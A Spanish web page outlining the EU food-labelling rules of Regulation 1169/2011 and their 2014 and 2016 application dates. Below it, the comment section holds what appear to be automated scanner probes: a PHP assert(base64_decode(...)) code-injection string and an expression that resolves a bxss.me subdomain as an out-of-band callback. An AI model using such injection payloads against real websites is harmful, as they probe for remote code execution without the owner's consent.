Etiquetado de los alimentos - normas de la UE 2014

El nuevo Reglamento de la UE 1169/2011 sobre la información alimentaria facilitada al consumidor, cambios legislación sobre etiquetado de los alimentos incluidos existentes:

  • Información nutricional obligatorio de los alimentos procesados;
  • Etiquetado obligatorio sobre el origen de la carne sin procesar de cerdos, ovejas, cabras y aves de corral;
  • Alergenos destacando, por ejemplo, los cacahuetes o la leche en la lista de ingredientes;
  • Mejor legibilidad es decir, el tamaño mínimo de texto;
  • Requisitos relativos a la información sobre los alérgenos también cubren los alimentos no empaquetados incluyendo los que se venden en los restaurantes y cafeterías.

Las nuevas normas se aplicarán a partir del 13 de diciembre 2014. La obligación de proporcionar información nutricional será aplicable a partir del 13 de diciembre 2016.

Para mas información visite la página oficial

Tags: normativa,
Solo los usuarios registrados pueden dejar comentarios.

Comentarios (35):

0
testing[at]example.com #
;assert(base64_decode('cHJpbnQ obWQ1KDMxMzM3KSk7'));
0
testing[at]example.com #
gethostbyname(lc('hitqq'.'gxdl nqkkfcf6c.bxss.me.')).'A'.chr( 67).chr(hex('58')).chr(112).ch r(90).chr(101).chr(67)
0
testing[at]example.com #
bxss.me